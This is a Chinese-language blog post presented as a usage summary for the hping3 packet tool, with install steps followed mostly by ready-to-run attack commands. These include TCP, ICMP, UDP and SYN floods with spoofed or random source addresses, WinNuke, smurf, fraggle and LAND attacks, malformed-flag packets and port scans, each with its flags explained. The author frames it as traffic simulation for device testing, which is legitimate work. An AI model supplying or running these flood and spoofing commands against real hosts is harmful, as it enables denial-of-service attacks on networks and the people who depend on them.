etcd c 使用 hping 命令使用小結

2021-10-17 09:23:35 字數 4187 閱讀 5647

寫在之前

本篇只是在工作中,需要模擬一些網路包的狀態時,使用hping3命令可以很好的模擬,注意請不要用於非法用途,現在是法治社會哦。

安裝

1. 安裝依賴包

yum -y install libpcap-devel tcl-devel
檢查:libpcap及libpcap-devel是否存在,不存在就安裝,安裝後就做個連線:ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h 否則在編譯階段會報錯如下:

libpcap_stuff.c:19:21: fatal error: net/bpf.h: no such file or directory

2. 從github上clone源**

git clone
3. 編譯安裝

cd hping

./configure

make

make install

常用方式1. 向目標傳送資料報,比如傳送兩個資料報

hping3 -c 2 192.168.0.2hping3 -c 2 192.168.0.2
2. tcp 洪水攻擊

hping3 -sarupf -p 80 –flood –rand-source 192.168.100.1

hping3 --flood 192.168.0.2

3. icmp 洪水攻擊

hping3 --flood 192.168.0.2 -1

hping3 -q -n -d 200 –icmp –flood -a 11.11.11.11 192.168.100.1

-q安靜模式 -n不解析網域名稱 -a指定偽造ip

4. udp 洪水攻擊

hping3 --flood 192.168.0.2 -2

hping3 –udp -s 6666 -p 53 -a 8.8.8.8 –flood 192.168.100.1

5. syn 洪水攻擊

hping3 --flood 192.168.0.2 -s

hping3 -c 1000 -d 120 -s -p 80 –flood –rand-source 192.168.100.1

-c 指定連線數 -p 目標埠

-d 指定資料部分的大小 -s 攻擊型別是syn flood

–flood 以泛洪的方式攻擊 –rand-source 隨機產生偽造源位址

hping3 -s -p -u -p 80 –flood –rand-source 192.168.100.1
-p flag置為push -u flag置為urge緊急

加這兩引數可以提高效率

6. winnuke攻擊

hping3 -u 192.168.0.2 -p 139
winnuke 攻擊的埠不僅是139 埠,還有「138、137、113、53」等埠

7. 埠掃瞄

hping3 -8 all -s 192.168.0.2

hping3 -8 1-1024 -s 192.168.0.2

注意:-s是利用syn包進行掃瞄,也可以使用-2 udp形式進行掃瞄,-8是埠掃瞄模式,all是掃瞄所有的埠,如果掃瞄指定的埠的話,可以使用-來連線;

8. ip 位址欺騙攻擊

hping3 -a 111.111.111.111 192.168.0.2
-a 引數後接著的位址為需要隱藏的源位址,

9. ip分片

hping3 192.168.0.2 -s -p 80 -f
10. smurf 或者 fraggle攻擊

hping3 -1 192.168.0.255
hping3 -1 -a 192.168.0.1 192.168.0.255
fraggle攻擊即由smurf的icmp協議的攻擊改為由udp協議的攻擊,因此只需要修改乙個引數即可,

將「-1」 改為「-2」 (我們utm實現的是典型埠7模式即hping3 -2 192.168.0.255 -p 7)

11. land 攻擊

hping3 -s -a 192.168.0.2 -p 21 192.168.0.2

hping3 -n -s -p 80 -a 192.168.100.1 –flood 192.168.100.1

land攻擊即是偽裝成被攻擊位址傳送請求資訊給被攻擊位址本身 

12. tcp選項異常

(1) syn 包被分片# hping3 -s 192.168.0.2 -f

(2) tcp 包僅設定了fin flag# hping3 -f 192.168.0.2

(3) tcp包沒有設定任何flag# hping3 192.168.0.2

(4) tcp包的fin和rst flag同時被設定# hping3 -f -r 192.168.0.2

(5) tcp包的syn和urg flag同時被設定# hping3 -s -u 192.168.0.2

(6)tcp包的syn和rst flag同時被設定# hping3 -s -r 192.168.0.2

(7)tcp包的syn和fin flag同時被設定# hping3 -s -f 192.168.0.2

13. 資料報跟蹤

hping3 –traceroute -v -1 www.baidu.com
類似於traceroute www.baidu.com;

14. 檔案互傳

傳送端:

hping3 -2 -p 1373 192.168.100.102 -d 100 -e test.txt
-2 udp模式 -p埠

-d 資料大小 -e 檔名

接收端:

nc -lp 1373 -u -w 5 > recv.txt && cat recv.txt
-l 監聽模式 -p 埠

-w 超時時間 -u udp模式

您的關注是我寫作的動力

安裝使用類

tcpdump 使用小結

centos7.6核心公升級

centos 7 公升級 python 與 yum 修改

centos 7 安裝 redis 5.0.8 單例項

centos 7 下 yum 安裝 mysql 5.7 最簡教程

kubernetes中部署 nacos,使用外部mysql儲存

你真的了解客戶端請求如何到達伺服器端的嗎

**分享

kubeadm使用外部etcd部署kubernetes v1.17.3 高可用集群

第一篇  使用 prometheus 監控 kubernetes 集群理論篇

hping2 使用引數說明

hping引數,可以用hping h來看 h help 顯示幫助 v version 版本資訊 c count count 傳送資料報的次數 關於countreached timeout 可以在hping2.h裡編輯 i interval 包傳送間隔時間 單位是毫秒 預設時間是1秒,此功能在增加傳輸...

使用hping3 nping施行DoS攻擊

ddos攻擊是常見的攻擊方式,每小時大約發生28次。提供在世界範圍內的ddos實時攻擊分布圖 從ddos攻擊的地圖上就可以看出國際形勢 例如,到9月18號可以看到日本 中國的攻擊 川普宣布建牆之後,可以看到墨西哥 美國的攻擊。使用hping3進行dos攻擊 hping3 c 10000 d 120 ...

使用hping3 nping施行DoS攻擊

ddos攻擊是常見的攻擊方式,每小時大約發生28次。提供在世界範圍內的ddos實時攻擊分布圖 從ddos攻擊的地圖上就可以看出國際形勢 例如,到9月18號可以看到日本 中國的攻擊 川普宣布建牆之後,可以看到墨西哥 美國的攻擊。使用hping3進行dos攻擊 hping3 c 10000 d 120 ...